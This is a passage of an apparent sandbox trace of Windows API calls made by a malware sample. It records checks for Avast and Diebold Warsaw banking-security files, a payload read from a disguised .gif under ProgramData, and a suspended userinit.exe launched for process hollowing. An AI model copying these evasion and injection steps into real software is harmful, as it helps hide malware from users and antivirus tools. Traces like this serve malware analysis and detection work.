[102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0177.670] ResumeThread (hThread=0x130) returned 0x1
[0177.670] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0177.670] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0177.670] GlobalUnlock (hMem=0x95000c) returned 0
[0177.670] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0177.671] GlobalUnlock (hMem=0x950004) returned 0
[0177.677] Sleep (dwMilliseconds=0xe74e)
[0187.677] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0187.677] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0187.677] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0187.677] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0187.678] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138
[0187.678] SetFilePointer (in: hFile=0x138, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0187.678] SetFilePointer (in: hFile=0x138, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0187.678] SetFilePointer (in: hFile=0x138, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0187.678] SetFilePointer (in: hFile=0x138, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0187.679] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0187.680] ReadFile (in: hFile=0x138, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0187.685] CloseHandle (hObject=0x138) returned 1
[0187.685] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.686] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.686] GlobalUnlock (hMem=0x95000c) returned 0
[0187.686] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0187.686] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.687] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.687] GlobalUnlock (hMem=0x95000c) returned 0
[0187.687] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0187.687] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0187.688] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0187.688] GlobalUnlock (hMem=0x95000c) returned 0
[0187.688] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0187.688] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0187.689] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0187.689] GlobalUnlock (hMem=0x95000c) returned 0
[0187.689] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0187.689] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0187.690] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0187.690] GlobalUnlock (hMem=0x95000c) returned 0
[0187.690] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0187.690] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0187.691] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0187.691] GlobalUnlock (hMem=0x95000c) returned 0
[0187.691] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0187.692] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.693] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.693] GlobalUnlock (hMem=0x95000c) returned 0
[0187.693] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0187.693] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.694] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.694] GlobalUnlock (hMem=0x95000c) returned 0
[0187.694] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0187.694] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.695] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.695] GlobalUnlock (hMem=0x95000c) returned 0
[0187.695] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0187.695] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.696] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.696] GlobalUnlock (hMem=0x95000c) returned 0
[0187.696] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0187.696] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.696] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.696] GlobalUnlock (hMem=0x95000c) returned 0
[0187.696] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0187.696] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.697] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.697] GlobalUnlock (hMem=0x95000c) returned 0
[0187.697] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0187.697] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.698] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.698] GlobalUnlock (hMem=0x95000c) returned 0
[0187.698] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0187.698] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.699] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.699] GlobalUnlock (hMem=0x95000c) returned 0
[0187.699] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0187.699] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.700] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.700] GlobalUnlock (hMem=0x95000c) returned 0
[0187.700] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0187.700] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.700] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.700] GlobalUnlock (hMem=0x95000c) returned 0
[0187.700] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0187.702] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0187.702] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0187.702] GlobalUnlock (hMem=0x95000c) returned 0
[0187.702] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0187.702] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0187.703] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0187.703] GlobalUnlock (hMem=0x95000c) returned 0
[0187.703] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0187.705] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0187.706] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0187.706] GlobalUnlock (hMem=0x95000c) returned 0
[0187.706] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0187.706] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.707] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.707] GlobalUnlock (hMem=0x95000c) returned 0
[0187.707] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0187.707] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.707] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.707] GlobalUnlock (hMem=0x95000c) returned 0
[0187.708] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0187.708] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.708] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.708] GlobalUnlock (hMem=0x95000c) returned 0
[0187.708] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0187.708] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.709] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.709] GlobalUnlock (hMem=0x95000c) returned 0
[0187.709] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0187.709] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.710] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.710] GlobalUnlock (hMem=0x95000c) returned 0
[0187.710] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0187.710] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.711] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.711] GlobalUnlock (hMem=0x95000c) returned 0
[0187.711] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0187.711] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.711] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.711] GlobalUnlock (hMem=0x95000c) returned 0
[0187.711] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0187.711] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.712] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.712] GlobalUnlock (hMem=0x95000c) returned 0
[0187.712] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0187.712] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.713] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.713] GlobalUnlock (hMem=0x95000c) returned 0
[0187.713] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0187.713] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.713] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.713] GlobalUnlock (hMem=0x95000c) returned 0
[0187.714] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0187.714] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.714] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.714] GlobalUnlock (hMem=0x95000c) returned 0
[0187.714] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0187.714] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.715] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.715] GlobalUnlock (hMem=0x95000c) returned 0
[0187.715] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0187.715] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.716] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.716] GlobalUnlock (hMem=0x95000c) returned 0
[0187.716] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0187.716] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.716] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.716] GlobalUnlock (hMem=0x95000c) returned 0
[0187.717] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0187.717] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.717] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.717] GlobalUnlock (hMem=0x95000c) returned 0
[0187.717] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0187.717] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.718] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.718] GlobalUnlock (hMem=0x95000c) returned 0
[0187.718] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0187.718] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.719] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.719] GlobalUnlock (hMem=0x95000c) returned 0
[0187.719] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0187.719] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.719] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.719] GlobalUnlock (hMem=0x95000c) returned 0
[0187.719] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0187.720] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.720] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.720] GlobalUnlock (hMem=0x95000c) returned 0
[0187.720] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0187.720] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.721] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.721] GlobalUnlock (hMem=0x95000c) returned 0
[0187.721] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0187.721] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.722] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.722] GlobalUnlock (hMem=0x95000c) returned 0
[0187.722] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0187.722] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.722] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.722] GlobalUnlock (hMem=0x95000c) returned 0
[0187.722] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0187.722] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.723] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.723] GlobalUnlock (hMem=0x95000c) returned 0
[0187.723] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0187.723] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.725] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.725] GlobalUnlock (hMem=0x95000c) returned 0
[0187.725] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0187.725] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.725] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.725] GlobalUnlock (hMem=0x95000c) returned 0
[0187.725] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0187.726] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.726] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.726] GlobalUnlock (hMem=0x95000c) returned 0
[0187.726] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0187.726] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.727] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.727] GlobalUnlock (hMem=0x95000c) returned 0
[0187.727] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0187.727] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0187.728] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x134, hThread=0x138, dwProcessId=0x2a8, dwThreadId=0x5a8)) returned 1
[0187.735] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0187.735] GetThreadContext (in: hThread=0x138, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdc000, Edx=0x0, Ecx=0x0, Eax=0xcf2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x12fba8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, 